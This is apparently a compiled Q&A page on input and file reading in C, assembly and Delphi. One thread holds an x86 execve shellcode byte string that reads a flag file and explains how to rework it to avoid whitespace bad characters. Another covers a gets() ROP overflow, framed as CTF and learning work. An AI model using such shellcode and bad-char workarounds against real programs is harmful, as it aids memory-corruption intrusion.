How can I read a whole line of input in Assembly? - string

The only subroutine I know of capable of reading a user's alphabetical input is read_char, but how I want to be able to read the user's whole input of char no matter how long.
I have a vague notion that I have to make memory room to store the whole input or something? I'm really lost as I'm not certain if Assembly has a C++ equivalent of reading strings.
Thanks in advance.

Well, you should have a limit when reading input from the user, otherwise your program might not work properly anymore (see buffer overflow for more informations), so making room for the input and ensure the input won't exceed the buffer is very important.
Now, to get a string you have to call a dos interrupt, giving a pointer to your buffer and some other stuff. It will read until a carriage return is met.
But I think your prof wants you to read using his read_char, so (since this is homework), I'll give you a small advice: you have to do a loop and read chars until..

Related

How to deal with a bad char in a shellcode buffer overflow?

So I got recently interested in buffer overflow and many tutorials and recourses online have this CTF like attack where you need to read the content of a flag file (using cat for example).
So I started looking online for assembly examples of how to do this and I came accross sites like this or shell-storm where there are plenty of examples on how to do this.
So I generated my exploit and got this machine code (it basically executes a shell doing cat flag):
shellcode = b'\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x66\x6c\x61\x67\x89\xe1\x50\x51\x53\x89\xe1\x31\xc0\x83\xc0\x0b\xcd\x80'
The problem is that, thanks to stepping in with GDB to debug the problem, I noticed that my buffer doesn't get copied starting with \x0b towards the end of the shell code. I know the problem is there because if I change it to say \x3b then it works (with the rest of my exploits not copied here) even if it obviously crashes when it reaches the wrong value there but at least the whole buffer gets copied. Now doing some research it seems like \x0b is a "bad char" which can cause issues and should be avoided. Having said this I don't understand how:
All those online and even university tutorials use that shell code
for this exact task.
How to potentially fix this. Is it even possible without completely
change the assembly code?
I will add that I am on Ubuntu and trying to make this work on 64 bits.
One thing that's special about byte 0x0b is it's ASCII Vertical Tab, which is considered a whitespace character.
So I'm going to make a wild guess that the code you're exploiting looks something like
// Dangerous code, DO NOT USE
char buf[TOO_SMALL];
scanf("%s", buf);
since scanf("%s") is a commonly (mis)used input mechanism that stops when it hits whitespace. If so, then if your shellcode contains 0x0b or any other whitespace character, it will get truncated.
To your first question, as to "why do other tutorials use shellcode like this", they may be thinking instead of exploiting code like
// Dangerous code, DO NOT USE
char buf[TOO_SMALL];
gets(buf);
where gets() will not stop reading at 0x0b but only at newline 0x0a. Or maybe they are thinking of a buffer filled by strcpy() which will only stop at 0x00, or maybe a buffer filled by read() with a user-controlled size which will read the full amount of data no matter what bytes it contains. So the question of which characters are "bad" depends on what the vulnerable code actually does.
As to how to handle it, well, you need to modify your shellcode to use only instructions that don't contain any whitespace bytes. This sort of thing is more an art than a science; you have to know your instruction set well, and be creative in thinking about alternative instruction sequences to achieve the desired result. Sometimes you may be able to do it with minor tweaks; other times a wholesale rewrite may be needed. It really varies.
In this case, luckily the 0x0b is the only whitespace character in the whole code, and it appears in the instruction
83C00B add eax, 0x0b
Since eax was previously zeroed, the goal is to load it with the value 0xb which is the system call number of execve. When the "bad byte" appears as part of immediate data, it is usually not too hard to find another way to get that data to where it needs to go. (Life is harder when the bad byte is part of the opcode itself.) In this case, a simple solution is to take advantage of two's complement, and write instead
83E8F5 sub eax, -0x0b
The single byte -0x0b = 0xf5 gets sign-extended to 32 bits and used as the value to subtract, which leaves 0x0b in eax as desired. Of course there are lots of other ways, some of which may have smaller code size; I'll leave this to your ingenuity.
To find out the "bad char" for the shellcode is an important step to exploit an overflow vulneribility.
first, you have to figure out how many bits the target can be overflow (this field is also for the shellcode). if this zone is big enough and you can use all the "char"(google bad char from \x01 to \xff. \x00 is bad char) to act as shellcode send to target.
Then you can get find the Register to see what the char left.(if the zone is not big enough for all the chars you can send just some chars one time and repeat)
you can follow this https://netsec.ws/?p=180.

read() in linux for event file

I'm writing a program to track the mouse movements in linux. I read in another post that this can be done using read() system call to read the EventX file related to the mouse. I earlier was reading the serial port file and i used the read() to read it. But, then i sent in a character array to it and got back the serial characters. But, it doesnt seem to be in the mouse's case. The lines:
struct input_event ie;
read(fd, &ie, sizeof(struct input_event)
are used to read it. Here the ie is a struct. But i used to send in a char buffer in the serial port case. So, my question is: how do I know what struct/buffer to send. I got to know the answer for the above two code lines after googling, but if I want to read some other file,how would i know what struct/buffer to send. Please help me.
Thank you.
The input subsystem in Linux uses a standarized format to deliver its messages. It is actually quite simple:
You open the relevant input file, usually /dev/input/event<n>, using the open() system call.
You read input events from that file, using the read() function, as you noted in your question.
Every event from that file has a well known structure: that is struct input_event. You don't need to know the exact layout of that structure, that is done by the compiler. Just include the relevant header file: #include <linux/input.h>.
What you do want to know are the fields of this structure that are useful, and what they mean. I recommend you to read the official documentation as well as the input.h source.

Windows console application with gets() ROP exploit

I'm trying (for learning purposes) to take advantage of gets() function vulnerability using return-oriented programming (ROP) technique. The target program is a Windows console application that in some point asks for some input, and then uses gets() to store the input in the local 80 characters long array.
I created a file that contains 80 'a' characters in the beginning + some extra characters + 0x5da06c48 address for overwriting the old EIP pointer.
I'm opening the file in text editor and copy-pasting the content into the console as input. I've used IDA Pro (or OllyDbg) to set a breakpoint right after the return from the gets() function and noticed that the address was corrupted - it was set to 0x3fa03f48 (two 3f substitutions).
I've tried other addresses as well - part of them works well, but most of the times the address is being corrupted (sometimes characters missing or substituted, sometimes truncated).
How to get over this problem? Any suggestion will be highly appreciated!
Copy-Pasting binary data is hit-and-miss. Have you tried feeding the input into your test program directly from the file using input redirection?
First of all keep track of the Endianness of your platform. If you think your bits are in the right order but you are still getting malformed input, it might be that your shell/text editor isn't binary safe. You are better off writing an exploit for this flaw in a scripting language such as Python, using the Subprocess library which allows you to write data directly to an arbitrary process's stdin pipe.

How to partially read from a TStringStream, free the read data from the stream and keep the rest (the unread data)?

What I want to do: lets suppose I have a TStringStream that just read a string with 100 characters. If I call .ReadString(50), I will get the first 50 characters of this stream and its cursor is going to be placed on the position 51.
My question is: how do I toss the characters 1 to 50 in this stream in a fast and clean way? I want to read the rest (51 to 100) later.
Thanks in advance.
You cannot do what you are hoping to do. The string stream's data is a Delphi string which is stored as a single memory block. Memory blocks are atomic, they cannot be split. You cannot free some part of a memory block.
If you really need to return memory to the memory manager then you should create a new string with the already processed data removed. You can then re-create your string stream with this new input and destroy the previous string stream.
Having said that, it's hard to see that doing much other than increasing your memory fragmentation. If the sizes of memory involved are large enough, and if the string stream persists for long enough, then this just might be a sensible approach. Otherwise it sounds like an attempt to optimise that actually would hinder performance.
Perhaps some class other than string stream could be more appropriate but it's very hard to advise without knowing more details.
You can't do this. If you really need to do this, you should write your own class that implements the stream-interface and which would let you process some data a little bit at a time and free whatever you want to free. Note that you would only be able to go through the data once, since you've now deleted your data. That is, seeking to the beginning again would become impossible, and your current stream "position" would be a lie.
In short, sounds like you're confused.
If I understand correctly you which to skip forward in the stream?
You can do:
Str.Position := Str.Position + 50;
Or like this:
Str.Seek(50,TSeekOrigin.soCurrent);

Doing file operations with 64-bit addresses in C + MinGW32

I'm trying to read in a 24 GB XML file in C, but it won't work. I'm printing out the current position using ftell() as I read it in, but once it gets to a big enough number, it goes back to a small number and starts over, never even getting 20% through the file. I assume this is a problem with the range of the variable that's used to store the position (long), which can go up to about 4,000,000,000 according to http://msdn.microsoft.com/en-us/library/s3f49ktz(VS.80).aspx, while my file is 25,000,000,000 bytes in size. A long long should work, but how would I change what my compiler(Cygwin/mingw32) uses or get it to have fopen64?
The ftell() function typically returns an unsigned long, which only goes up to 232 bytes (4 GB) on 32-bit systems. So you can't get the file offset for a 24 GB file to fit into a 32-bit long.
You may have the ftell64() function available, or the standard fgetpos() function may return a larger offset to you.
You might try using the OS provided file functions CreateFile and ReadFile. According to the File Pointers topic, the position is stored as a 64bit value.
Unless you can use a 64-bit method as suggested by Loadmaster, I think you will have to break the file up.
This resource seems to suggest it is possible using _telli64(). I can't test this though, as I don't use mingw.
I don't know of any way to do this in one file, a bit of a hack but if splitting the file up properly isn't a real option, you could write a few functions that temp split the file, one that uses ftell() to move through the file and swaps ftell() to a new file when its reaching the split point, then another that stitches the files back together before exiting. An absolutely botched up approach, but if no better solution comes to light it could be a way to get the job done.
I found the answer. Instead of using fopen, fseek, fread, fwrite... I'm using _open, lseeki64, read, write. And I am able to write and seek in > 4GB files.
Edit: It seems the latter functions are about 6x slower than the former ones. I'll give the bounty anyone who can explain that.
Edit: Oh, I learned here that read() and friends are unbuffered. What is the difference between read() and fread()?
Even if the ftell() in the Microsoft C library returns a 32-bit value and thus obviously will return bogus values once you reach 2 GB, just reading the file should still work fine. Or do you need to seek around in the file, too? For that you need _ftelli64() and _fseeki64().
Note that unlike some Unix systems, you don't need any special flag when opening the file to indicate that it is in some "64-bit mode". The underlying Win32 API handles large files just fine.

Resources